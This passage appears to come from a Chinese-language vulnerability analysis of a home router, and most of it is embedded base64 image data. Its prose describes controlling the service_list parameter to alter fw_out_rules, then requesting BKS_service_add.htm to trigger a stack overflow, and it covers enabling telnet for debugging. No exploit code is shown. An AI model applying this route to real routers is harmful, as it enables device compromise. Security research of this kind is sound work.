NqKzDqokVKDWVLLwZb8elAKsyX+K3+uz4fvS/ievjw8AABty/QDAAAA0LZMPwAAAABty/QDAAAA0LZMPwAcSKVSKZvNdnR0ZGAvRJeiUdGrBACgvZh+ADh4SqWS0Ye/NADtyfqzuDx3/fmxS4VD8p8nahBlSADgT0w/ANBSNpvNZDKdnZ3VajVZ9bXWLOQr9+/O3554O3Dm2ameosjvuXplOkoSmZ35nPwquhSNil5Fu5KdWm4svajcLM6PPZy7ODJ5JJ1jhPzLRA2iDFGJKEbUIwGADUw/ANDS2snPz92nVmtMv/p0fqiczrlBUphbE3OL1XqzubJh/Vk7/Nnx7jP7MTdePprODUL2N1GMqIf1B4CNTD8A0FJmVfJDIf9heLB0urfY2/1YZCs52z95bfR1rD+tq7UjcdYxXj56uXg4ndOD7G+iGFGPKEkCAOuZfgBgK9PPg3vvTnblRbaVC8PlSmV5D6ef4vxYOkcHSU+iJAkArGf6AYDNp59mc6VarU/cmDnRlRPZVobOPZ16uVj70tj99PNtpbFUX4iXLumcGyQ9iZJEVaIwCQCsMf0AwObTT7VaHx2Z6u8rdB9/JLKt9PbkBgee5HPvdz/9LNUX7rzp89dZtvL1OaoShUkAvrN3pk9pZWkY/7uml+lOx2R69g9T0zVdPTOdjjFmj4nGpE00ZjGbxqidpZPunnTcI4r7gigii1sExQhuoECMcFHRXLd2n1cO93JBuECJBVrvr56yzjnv855zuJdPT1ElghAw+kEQBEEQ/uiHsi5kpqsS4+X7SbJR2g3bhDDyLinsm6EdjMoi9DEGKHGjaefRz/SisUgT86Tj8P5Ti8VCM7wz79pBI8op2sFkeWQ+hxAKvir4794RBEEQFxj9IAiCIAh/9GO1LjxM706Mb/Wrywmy7xPlifEy93XZlUtbIuvhl8xG+2BUBoYIEkQ/kXmxYCUWGUMS/RT2xjxuO7zv9HiYvGcml9mtg4Zc0U+kPoqQqbAXox8EQRCEA0Y/CIIgCOI3+sl40JVwocWvkpMUaTfbr1xq5S4mxktTk5UpVxWwfumiFFbCqZL3NpqHGU0J2CJFZRom+mmF6R5Wo2gsBNHPgrFAfSxHcWi/aRASGS461W4fNFkeoY8idIKvyvQCRj8IgiAIA0Y/CIIgCOIv+plPv98ZHyfh0eUEacb9rpLiweYm0/OnvTdSlGT9yiXpnVvt5WXD1ZX63F/7U5MVEATAepik1bDBj+19KbvOzYNGR2ElQlTqin5guofV2BCa6CdPdSxbFrXP1DxhobewmG1kQJuNh3Lkh0HZ8kPZMpDvdrnL6f+sASb6sQkj81GEUHkqjH4QBEEQDhj9IAiCIIif6Mcy/+Bux8XzTb4UH9ecclUmLB0aGbEvLKwo5OMvfuxNutyamNBy51ZbQZ7WZPxgoxb6NLacR90QBkFLePR63Bnx2MZLvZUMUrdFqYF2w2DgVA0G11YwZqGknueOMlXW3+wswSCuGfIdblnqqjIlcjFY55Ti49ipZ8nrdLdL/BLVj+48+pmaN+a+iX4kjdpfyhkkL3lG2SQVmmnnuLn1cHbr4azWQ1ng0bkim0djOjIkUzBs2UADPj3sWdx9uGPufdjeqfc54X0yObIvf+74+kXbPx/L/wwfM9h2+KpMzWP0gyAIgjBg9IMgCIIgfqOf+3fa4s42+tKl+Ob0++063RTkPuvrG3Nzy12dEz8977mX1iYUDI6b6aXF1dXV9enpxQrh0D2yVTgk6LU7k5QWv+
|
|||
|
|
<p blockindex=22><img src=data:image/png;base64,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
|
|||
|
|
<p blockindex=23>所以我们需要控制请求里的 <code>service_list</code>参数,来修改<code>fw_out_rules</code>,最后访问<code>BKS_service_add.htm</code>触发栈溢出。</p>
|
|||
|
|
<p blockindex=24><img src="data:image/png;base64,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
|
|||
|
|
<h2 blockindex=25>动态调试</h2>
|
|||
|
|
<h3 blockindex=26>路由器配置</h3>
|
|||
|
|
<h4 blockindex=27>开启telnet</h4>
|
|||
|
|
<p blockindex=28>虽然该款路由器开启调试的方式早已公开,但是为了弄清楚细节,最好的办法是手工逆一下。</p>
|
|||
|
|
<p blockindex=29>其中函数<code>CallActionByName</code>通过查<code>ActionTab</code>表比对参数<code>todo</code>的值方式来调用函数<code>todo</code>中的参数对应函数</p>
|
|||
|
|
<p blockindex=30><img src="<a href=https://s2.loli.net/2022/01/13/9WGF231OVSjyheT.png>https://s2.loli.net/2022/01/13/9WGF231OVSjyheT.png</a>" alt="image-20220107154406516" style="zoom: 67%;" /></p>
|
|||
|
|
<p blockindex=31><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=32>注意到这个部分在许多函数中都有出现,搜索发现是一个为了修CNNVD-201306-024而写的一个check(<a href=https://cloud.tencent.com/developer/article/1366157>IoT 分析 | 路由器漏洞频发,mirai 新变种来袭 - 云+社区 - 腾讯云 (tencent.com)</a>)。</p>
|
|||
|
|
<p blockindex=33><img src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABcIAAAL2CAIAAADtoHK2AADEVklEQVR42uzcz2vTYBzH8f0lLYGsFsKDij8oc3M4PKyZkU5oRUWdtVCJOsSL0kEFobsUkYIUkQ1aL4toPHiR7NCx0fuU7lgY3vwnNm1a2m/Dk+RJa1FLPy+eS5KnT57zmyedmp6O/LURi8VCIie6mJtTsdmzl5eSn77frP1c+fbLddywfixX907PXDx55hzzEW9jLelSzVZKc3PoieAmbXsyRcuNUL0RLuvMjxYtW1K9EeoOyaxE1SFXUzIVyRQupUXzlf43hk1LzmiMp+qy2TfNdTVtffugZXtdY15WdzaaxxvNnSRzSG4d2/e31phDKrtr38+tMoGgW9Cr9uP2BJ0BAAAAAADAyE2NV0ZpNZQLtx5QNHEbd/ePVvaPzi8mWiWFiflllHjOqLUYubj7XWSUTCVMkcIx5Axz0mWzVyg0RdUjZStsXxYU5hAkoyh5q/1eu4koql1nOpcRlVuH3qgpmUJnD1JeY/3UgtRpMWXdazX/hEHWck0qI343ueYSjF49oE24POypoqMAAAAAAACM2PhllLl7T7Q3XyiaeI/Fl+9mrt9nYgNnFH7+BGcUxpR2oeiFD/uyPVzKCEUTAVFG0WUqNT7r0zRfWoTaiucGAmYU/uCJey6hoyjFYorm0K844k3gNAoAAAAAAIC/ycso89lny9W9IBll6dWH2dsPmZh3RuE6Ct1DRhk2fPzxanQEphL1uUkvpT7iuRp/9kQtSNwr9Kr4mAcfTZxhhSQ2i/a0w2yCscEyCg6bAAAAAAAADGfyMsqlxy9SnxtBMsrVt1/n0k+ZmF9GoWdGLh23E0q601DwUc9g4YNSxQhWU/Lc10AUPpyvyFSk3l+i5HVFFa1GdNm5muh7GkKf8NBlJ5cQrq0sFA+RUQAAAAAAAP5/Y5ZR5rPPr72vB8koV15/nLvziIkJMoqdTkpGrY9hIKP8o4xCTz0zCn/gRYvmC7Jp2Rvo/p0Kn1FC/OA2LPioh1Ai6R0z2d1cYIRvK+KMwm8CAAAAAOA3e3fQ2jQYBnD8swREBuXtaOl02ilz9WA6g/XQ0U08KGWMeBnsVmQXoSp4GUhPIg0IeimCB6VF6KfwKJ79FkvSNk+7N+ubjLVs5P8jl8G7tuc/7/MEQCoZzC